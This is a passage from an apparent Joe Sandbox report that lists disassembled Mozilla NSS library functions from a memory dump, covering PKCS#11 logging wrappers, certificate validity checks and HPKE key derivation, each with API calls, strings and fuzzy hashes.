Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
API String ID: 1003633598-4293906258
Opcode ID: b09e17ac74f925a166a9bd5ae0dd44bfac97c0b857ecbf59d5182cf99eca8497
Instruction ID: 33b52b4dd48c27510fe964e4e460e51295efd38ba2414526a2944803571b8ad3
Opcode Fuzzy Hash: b09e17ac74f925a166a9bd5ae0dd44bfac97c0b857ecbf59d5182cf99eca8497
Instruction Fuzzy Hash: 705107355021D5EFDB109F94DD48F9EBB76EB4631CF088066F90867A11D731AC8ACB92

Function 6CAD4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CAC4F51,00000000), ref: 6CAD4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAC4F51,00000000), ref: 6CAD4C5B
PR_smprintf.NSS3(6CBAAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CAC4F51,00000000), ref: 6CAD4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CAC4F51,00000000), ref: 6CAD4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAD4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAC4F51,00000000), ref: 6CAD4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAC4F51,00000000), ref: 6CAD4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CAD4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CAD4DA2
free.MOZGLUE(?), ref: 6CAD4DB9
free.MOZGLUE(00000000), ref: 6CAD4DCF

Strings

%s,%s, xrefs: 6CAD4C4B
ootT, xrefs: 6CAD4D1A
any, xrefs: 6CAD4C96
rust, xrefs: 6CAD4D22
slotFlags, xrefs: 6CAD4D34
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6CAD4D9D
0x%08lx=[%s %s], xrefs: 6CAD4D80
rootFlags, xrefs: 6CAD4D47
every, xrefs: 6CAD4CA1
timeout, xrefs: 6CAD4C91

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 5e047a68cf995e1421cc93c2316344d518829030df3b09c287454addaa267c1a
Instruction ID: af144bacf1bf9c839e92ac959226e8dd0b10b35be2acdd204ce685e3786d7d92
Opcode Fuzzy Hash: 5e047a68cf995e1421cc93c2316344d518829030df3b09c287454addaa267c1a
Instruction Fuzzy Hash: 5041BBB1900181ABDB129F999C44ABF3A65EF9630CF0E8124FC561B705E731E9A9C7D3

Function 6CA7DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CA7DDDE

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CA7DDF5

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA7DE34
PR_Now.NSS3 ref: 6CA7DE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CA7DE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA7DEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA7DEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA7DED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6CA7DEF0
PR_smprintf.NSS3(6CBAAAF9,(NULL) (Validity Unknown)), ref: 6CA7DF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA7DF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA7DF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA7DF33
free.MOZGLUE(00000000), ref: 6CA7DF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA7DF4B
free.MOZGLUE(00000000), ref: 6CA7DF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA7DF8E

Strings

{???}, xrefs: 6CA7DE8B
(NULL) (Validity Unknown), xrefs: 6CA7DEFA
%s%s, xrefs: 6CA7DEEB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: bc5f36abfcde71c65bccef337b1a7bc336753033d4c2b4ae1f02a7e5aa5c596b
Instruction ID: d275019db654ac5748876f45400b6d545d45193b4ae8d481151e97553afb654c
Opcode Fuzzy Hash: bc5f36abfcde71c65bccef337b1a7bc336753033d4c2b4ae1f02a7e5aa5c596b
Instruction Fuzzy Hash: B051B1B9E002419BDB209F659D41AAF7BB9BF95358F184029E809E7700E731E945CBF2

Function 6CAA08F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON

Download Yara Rule

APIs

htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6CAA094D
htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA0953
htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6CAA096E
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6CAA0974
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CAA098F
htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6CAA0995

Part of subcall function 6CAA1800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAA1860
Part of subcall function 6CAA1800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6CAA09BF), ref: 6CAA1897
Part of subcall function 6CAA1800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAA18AA
Part of subcall function 6CAA1800: memcpy.VCRUNTIME140(?,?,?), ref: 6CAA18C4

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CAA0B4F
SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CAA0B5E
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6CAA0B6B
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6CAA0B78

Strings

key, xrefs: 6CAA0ACB
base_nonce, xrefs: 6CAA0B06
secret, xrefs: 6CAA0A88
psk_id_hash, xrefs: 6CAA09B5
exp, xrefs: 6CAA0B36
info_hash, xrefs: 6CAA09E0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
API String ID: 1637529542-763765719
Opcode ID: e4dd89e8cc8102b0f1f9edd65eedf0c84f8913e75e728977a888f07f6663e41f
Instruction ID: 528afbb90da7312641452cb76b3cf111d725911e2f437815b21ad7892cef02fc
Opcode Fuzzy Hash: e4dd89e8cc8102b0f1f9edd65eedf0c84f8913e75e728977a888f07f6663e41f
Instruction Fuzzy Hash: 42818B79604345AFC700CF94CD8099AF7E8EF8C208F048919FA9997751E731E95ACB92

Function 6CAA89B0 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 149COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GenerateKey), ref: 6CAA89D6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAA8A04
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA8A13

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAA8A29
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CAA8A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6CAA8A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6CAA8A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6CAA8AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6CAA8B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAA8B52
PR_LogPrint.NSS3(?,00000000), ref: 6CAA8B68

Strings

hSession = 0x%x, xrefs: 6CAA89EE, 6CAA89FE
C_GenerateKey, xrefs: 6CAA89D1
pMechanism = 0x%p, xrefs: 6CAA8A46
ulCount = %d, xrefs: 6CAA8A7E
phKey = 0x%p, xrefs: 6CAA8A9C
pTemplate = 0x%p, xrefs: 6CAA8A62
(CK_INVALID_HANDLE), xrefs: 6CAA8A0C, 6CAA8B4B
*phKey = 0x%x, xrefs: 6CAA8B2D, 6CAA8B3D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKey
API String ID: 1003633598-2039122979
Opcode ID: 39774fbe96b1c3338f87f17fac68400482de56121129b09e4ab9fa490f8c20b9
Instruction ID: 8db4a5f4defcd79f3fddfa8ec2ef6f8f3107383f6116e4c1cb43b7acf74b4b41
Opcode Fuzzy Hash: 39774fbe96b1c3338f87f17fac68400482de56121129b09e4ab9fa490f8c20b9
Instruction Fuzzy Hash: 6951B5346022D5AFDB00DF94DD98F9F7B75EB46318F44806AE8056BA11D730AC9ACB92

Function 6CAB2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CAB2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CAB2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAB2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAB2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CA84F1C,?,-00000001,00000000,?), ref: 6CAB2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CA84F1C,?,-00000001,00000000), ref: 6CAB2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAB2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAB2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAB2EF8
PR_Unlock.NSS3(?), ref: 6CAB2F62
TlsGetValue.KERNEL32 ref: 6CAB2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6CAB2F9E
PR_Unlock.NSS3(?), ref: 6CAB2FCA
TlsGetValue.KERNEL32 ref: 6CAB301A
EnterCriticalSection.KERNEL32(?), ref: 6CAB302E
PR_Unlock.NSS3(?), ref: 6CAB3066
PR_SetError.NSS3(00000000,00000000), ref: 6CAB3085
PR_Unlock.NSS3(?), ref: 6CAB30EC
TlsGetValue.KERNEL32 ref: 6CAB310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6CAB3124
PR_Unlock.NSS3(?), ref: 6CAB314C

Part of subcall function 6CA99180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CAC379E,?,6CA99568,00000000,?,6CAC379E,?,00000001,?), ref: 6CA9918D
Part of subcall function 6CA99180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CAC379E,?,6CA99568,00000000,?,6CAC379E,?,00000001,?), ref: 6CA991A0

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607D6
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C9F204A), ref: 6CA607E4
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,6C9F204A), ref: 6CA60864
Part of subcall function 6CA607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA60880
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,6C9F204A), ref: 6CA608CB
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608D7
Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(?,?,6C9F204A), ref: 6CA608FB

PR_SetError.NSS3(00000000,00000000), ref: 6CAB316D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: cef4aab755c4da175293f14c473bfa1405fde683b52320cfddc408f55173e9b5
Instruction ID: 590d1766c59f050168bd51a4e4ca5f24efb16798409aaa54796a543d9de5093f
Opcode Fuzzy Hash: cef4aab755c4da175293f14c473bfa1405fde683b52320cfddc408f55173e9b5
Instruction Fuzzy Hash: 8AF19CB5D016189FDF00DF68D884B9EBBB8FF09318F184269EC44A7711EB31A995CB81

Function 6CAAAF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6CAAAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAAAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAAAF83

Part of subcall function 6CB8D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB8D963

PR_LogPrint.NSS3(?,00000000), ref: 6CAAAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6CAAAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6CAAAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CAAAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CAAB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CAAB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6CAAB041

Strings

hSession = 0x%x, xrefs: 6CAAAF5E, 6CAAAF6E
pSignature = 0x%p, xrefs: 6CAAB023
C_SignMessage, xrefs: 6CAAAF41
pParameter = 0x%p, xrefs: 6CAAAFB9
pulSignatureLen = 0x%p, xrefs: 6CAAB03C
pData = 0x%p, xrefs: 6CAAAFEF
ulDataLen = %d, xrefs: 6CAAB00A
ulParameterLen = 0x%p, xrefs: 6CAAAFD4
(CK_INVALID_HANDLE), xrefs: 6CAAAF7C

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage
API String ID: 1003633598-1612141141
Opcode ID: 76374aa864ab97f016c82690480f002940781c5dd01d9263b6d383a3686f6961
Instruction ID: ee0526e95dedd881f3e72d244434ff6200ef60945f357a4579d07ce7d46be97e
Opcode Fuzzy Hash: 76374aa864ab97f016c82690480f002940781c5dd01d9263b6d383a3686f6961
Instruction Fuzzy Hash: C941E6356020D4EFDB14CF94ED58E8D7BB2EB4631DF488065F90857A11D731AC99CBA2

Function 6CAB6CD0 Relevance: 30.3, APIs: 20, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAB6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CAB6943
Part of subcall function 6CAB6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CAB6957
Part of subcall function 6CAB6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CAB6972
Part of subcall function 6CAB6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CAB6983
Part of subcall function 6CAB6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CAB69AA
Part of subcall function 6CAB6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CAB69BE
Part of subcall function 6CAB6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CAB69D2
Part of subcall function 6CAB6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CAB69DF
Part of subcall function 6CAB6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CAB6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAB6D8C
free.MOZGLUE(00000000), ref: 6CAB6DC5
free.MOZGLUE(?), ref: 6CAB6DD6
free.MOZGLUE(?), ref: 6CAB6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAB6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAB6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAB6E72
free.MOZGLUE(?), ref: 6CAB6EA7
free.MOZGLUE(?), ref: 6CAB6EC4
free.MOZGLUE(?), ref: 6CAB6ED5
free.MOZGLUE(00000000), ref: 6CAB6EE3
free.MOZGLUE(?), ref: 6CAB6EF4
free.MOZGLUE(?), ref: 6CAB6F08
free.MOZGLUE(00000000), ref: 6CAB6F35
free.MOZGLUE(?), ref: 6CAB6F44
free.MOZGLUE(?), ref: 6CAB6F5B
free.MOZGLUE(00000000), ref: 6CAB6F65

Part of subcall function 6CAB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAB781D,00000000,6CAABE2C,?,6CAB6B1D,?,?,?,?,00000000,00000000,6CAB781D), ref: 6CAB6C40
Part of subcall function 6CAB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAB781D,?,6CAABE2C,?), ref: 6CAB6C58
Part of subcall function 6CAB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAB781D), ref: 6CAB6C6F
Part of subcall function 6CAB6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAB6C84
Part of subcall function 6CAB6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAB6C96
Part of subcall function 6CAB6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAB6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAB6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAB6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6CAB6FF4

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID:
API String ID: 1304971872-0
Opcode ID: 1ba5a5388946d7e625ad911658da4c1c0b558d42cee82e000eed8e4a9ed9f6a9
Instruction ID: 8ec697ecc4774d022151b69ccecd32ccc0bcfff640f0ed94ed386fb25047a7b2
Opcode Fuzzy Hash: 1ba5a5388946d7e625ad911658da4c1c0b558d42cee82e000eed8e4a9ed9f6a9
Instruction Fuzzy Hash: 60B15DB5E012499FEF04CBA5D885B9EBBBCAF09348F180024E815F7740E731E995CBA1

Function 6CAB4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CAB4C4C
EnterCriticalSection.KERNEL32(?), ref: 6CAB4C60
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4CA1
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAB4CBE
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4CD2
realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4D3A
PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4D4F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB4DB7

Part of subcall function 6CB1DD70: TlsGetValue.KERNEL32 ref: 6CB1DD8C
Part of subcall function 6CB1DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB1DDB4

Part of subcall function 6CA607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607AD
Part of subcall function 6CA607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C9F204A), ref: 6CA607CD
